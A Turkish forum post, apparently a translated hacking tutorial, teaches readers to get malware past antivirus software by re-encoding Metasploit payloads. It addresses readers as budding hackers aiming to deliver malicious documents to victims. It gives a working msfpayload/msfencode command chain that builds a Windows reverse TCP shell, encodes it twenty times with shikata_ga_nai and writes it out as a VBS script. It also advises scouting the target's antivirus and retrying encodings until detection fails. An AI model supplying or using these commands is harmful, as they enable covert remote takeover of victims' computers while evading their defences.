ForumDenizi.Com - Antivirüs algılamasından kaçınmak metasploit imzasını değiştirme

Hoş Geldiniz, Benim Gelişen Bilgisayar Korsanlarım!

Meterplayer İle Yük Taşıyan Veya Sistemin Sahibi Olmanızı Sağlayan Geri Kabuk İçeren Kötü Amaçlı Bir Pdf Veya Kötü Amaçlı Word Belgesi Oluşturma Konusunda Birkaç Dinleyici Kılavuzu Yazdım . Bu Teknikleri Kullanmanın Önündeki Engeller Hedef Sistemdeki Antivirüs (Av) Yazılımıdır . Örneğin, Kötü Amaçlı Bir Pdf Veya Word Doc'u E-Postayla Göndermeye Çalışırsanız, Kurban Sistemi Kurbana Bir Virüs Veya Başka Bir Zararlı Yazılım İçerdiğini Bildirir Muhtemeldir.

Bu Dersin Ana Dersi, Bu Virüsten Koruma Yazılımını Nasıl Geçebileceğimiz.

Antivirüs Yazılımının İşleyişi Hakkında Temel Bilgiler
Virüsten Koruma Yazılımı Şirketleri Genellikle Yazılımlarını, Virüslerin Ve Diğer Kötü Amaçlı Yazılımların "imzasını" Aramak İçin Geliştirir. Çoğu Durumda, Bilinen Zararlı Yazılımların Tanıdık Bir Kalıbı İçin Kodun İlk Birkaç Satırına Bakarlar. Vahşi Malware Bulduklarında, İmzalarını Virüs / Kötü Amaçlı Yazılım Veritabanına Eklerler Ve Bir Sonraki Bu Kötü Amaçlı Yazılımla Karşılaştığında Yazılım Bilgisayar Sahibini Uyarır.

Antivirüs Yazılımını Nasıl Atlatabilirsiniz
Açıkçası, Sıfır Günlük İstismar Veya Yepyeni Olan Ve Av Yazılımı Şirketleri Tarafından Hiç Görülemeyen Kötü Amaçlı Yazılımlar, Böyle Bir Algılama Şemasında Doğru Bir Şekilde Geçecektir.

Av Yazılımını Geçmenin Başka Bir Yöntemi, Kötü Amaçlı Yazılımın "imzasını" Değiştirmek. Başka Bir Deyişle, Kötü Amaçlı Yazılım Kodlamasını İşlevselliğini Değiştirmeden Değiştirebilirsek, Av Yazılımını Algılamadan Kolayca Geçmeliyiz. Kodlama Becerilerine Sahipseniz, Herhangi Bir Kötü Amaçlı Yazılımı Yeniden Kodlayabilir Ve İstenen Sonucu Elde Edebilirsiniz.

Bu Gelişmiş Kodlama Becerilerine Sahip Değilseniz, Hala Umut Var! Metasploit , Msfencode Adlı Yerleşik Bir Komutu Kullanıyor Ve Sukrojan Topluluğunu Bir Exploit İmzasını Gizlemeye İlişkin Daha Önceki Bir Kılavuzda Sunmuştum .

Metasploit Yüklerinin İmza Nasıl Değiştirilir
Bu Yazıda, Bu Komutu Ve Yüklerinizi Yeniden Kodlamak İçin Olan Yeteneklerini Daha Ayrıntılı İnceleyeceğiz. Başlamadan Önce Hızlı Bir Not - Keşif Yap !

Hedef Sistemin Hangi Av Yazılımını Kullandığını Bulun Ve Bu Av Paketinden Kaçınmak İçin Yeniden Kodlayın . Hiçbir Yeniden Kodlama Şeması Tüm Av Yazılımı İle Çalışmaz, Bu Nedenle Av Yazılımınızla Çalışan, Ancak Hedef Sistemin Av Yazılımından Kaçınamayacak Yeni Bir Kodlama Şeması Geliştirmek İçin Vakit Harcamayın.

Yani, Backtrack'i Açın Ve Metasploit'u Çalıştıralım!

Msfencode Kullanın

Yardım İçin -H Anahtarıyla Msfencode Yazarak Başlayalım .

Kod:

Msfencode -H

Gördüğünüz Gibi, Bu, Bu Komutla Kullanabileceğimiz Tüm Anahtarları Görüntüler. Not -E Anahtarı. Bu, Yükümüzü Yeniden Kodlamak İçin Kullanmak İstediğiniz Kodlayıcıyı Belirtir.

Ayrıca, -T Anahtarı İle Vurguladığım Bölümü Unutmayın . Bu Anahtar Çıktı Formatının Ne Olduğunu Belirler. Çiğ, Yakut, Perl, Java, Exe, Vba, Vbs, Vb. Dahil Olmak Üzere Birçok Formatın Olduğunu Görebilirsiniz. Bu Çıktıların Her Biri İmza Değiştirmek Ve Av Yazılımından Kaçmak İçin Bir Fırsat Verir.

Kodlama Şemalarını Listele

Sonra, Msfencode'da Hangi Kodlayıcıların Mevcut Olduğunu İnceleyelim.

Kod:

Msfencode -L

Msfencode Çok Sayıda Farklı Kodlama Düzenleri İçerir. Dördüncü Sırada "shikata_Ga_Nai" Görüyoruz. Not "mükemmel" Ve Bu Bir "polimorfik Xor Katkı Geri Besleme Enkoder" Olduğunu. Şimdi Buna Bir Göz Atalım.

Kod:

Garip Ses Veren Kodlayıcı Nedir?

Birincisi, Bu Tuhaf Sondaj Shikata_Ga_Nai Kodlayıcı, Gevşekçe "hiçbir Şey Yapılmayacak" Anlamına Gelen Japonca Bir Deyim. Kötü Niyetli Bir Kodlayıcı İçin Mükemmel Bir İsim!

İkincisi, Bu Bir Katkı Xor Polimorfik Kodlayıcıdır. Fazla Ayrıntıya Girmeden, Bunun Anlamı Xor Şifreleme Şemasını Kullanarak Şekli / İmzasını (Polimorfik) Değiştireceği Anlamına Gelir. Xor Mükemmel Bir Şifreleme Şemasından Çok Uzaktır, Ancak Verimli Ve Çoklu Şekil / İmzalar Üretebilir Ve Daha Sonra Hedefe Ulaştıktan Sonra Kodun Şifresini Çözebilir.

Payload'u Yeniden Kodlayın

Şimdi, Av Paket Yazılımını Eski Hale Getirmek İçin Ters Tcp Kabuğumuzu Yeniden Kodlamak İçin Shikata_Ga_Nai'yi Kullanalım. Backtrack Komut İsteminde Şunu Yazın:

Kod:

Msfpayload Windows/shell/reverse_Tcp Lhost=192.168.1.101 R |Msfencode -E X86/shikata_Ga_Nai -C 20 -T Vbs > /root/avbypass.vbs

Arıza

Bu Komutu Ayrı Tutalım Ve Ne Yaptığına Bakalım.

Kod:

Msfpayload Windows/shell/reverse_Tcp Lhost 192.168.1.101 R

Yukarıdaki Bölüm, 192.168.1.101 Adresindeki Bir Yerel Ana Bilgisayar İçin Ters Tcp Kabuğu İle Bir Yük Oluşturur.

Kod:

|

Bu Sembol, Aşağıdaki Komutu Dolduran Boru Anlamına Gelir.

Kod:

Msfencode -E X86/shikata_Ga_Nai -C 20 -T Vbs

Bu Yükü Skikata_Ga_Nai İle Yeniden Kodlamak Ve Bunu 20 Kez Çalıştırmak (-C 20) Ve Daha Sonra Bir .vbs Komut Dosyası Gibi Görünmek Üzere Kodlamak Demektir.

Kod:

> /root/avbypass.vbs

Yeni Şifrelenmiş Olan Yükü, / Root Dizinindeki Bir Dosyaya Gönderir Ve Avbypass.vbs Olarak Adlandırır, Böylece .vbs Komut Dosyası Gibi Görünür.

Sonuç

Bu Komutu Çalıştırdığımızda, Shikata_Ga_Nai'nin 20 Yinelemeyle Yükümüzü Çalıştırdığını Gösteren Aşağıdaki Çıktıyı Alıyoruz (-C 20).

Şimdi Shikata_Ga_Nai'ye Yeni Şifrelenmiş Yükümüzü Göndermek Ve Orada Olup Olmadığını Kontrol Etmek İçin Söylediği Dizine Gidelim.

Kod:

Cd /root



Ls -L

Gördüğünüz Gibi Şimdi, Avbypass.vbs Adlı Bir Kök Dizinde Bir Dosyamız Var, Şimdi Hedefin Av Yazılımına Karşı Bunu Test Edip Etmediğini Test Edebiliyoruz. Çoğu Durumda Bu Yöntem İşe Yarıyor, Ancak Değilse, Av Yazılımının Algılamadığı Bir Kodlamayı Buluncaya Kadar Yükü Çeşitli Yinelemelerle Göndermeniz Yeterlidir.

Geri Dönmeye Devam Edin, Hackerlandaki Daha Çok Macera İçin Yeni Gelişen Bilgisayar Korsanları!

Alıntı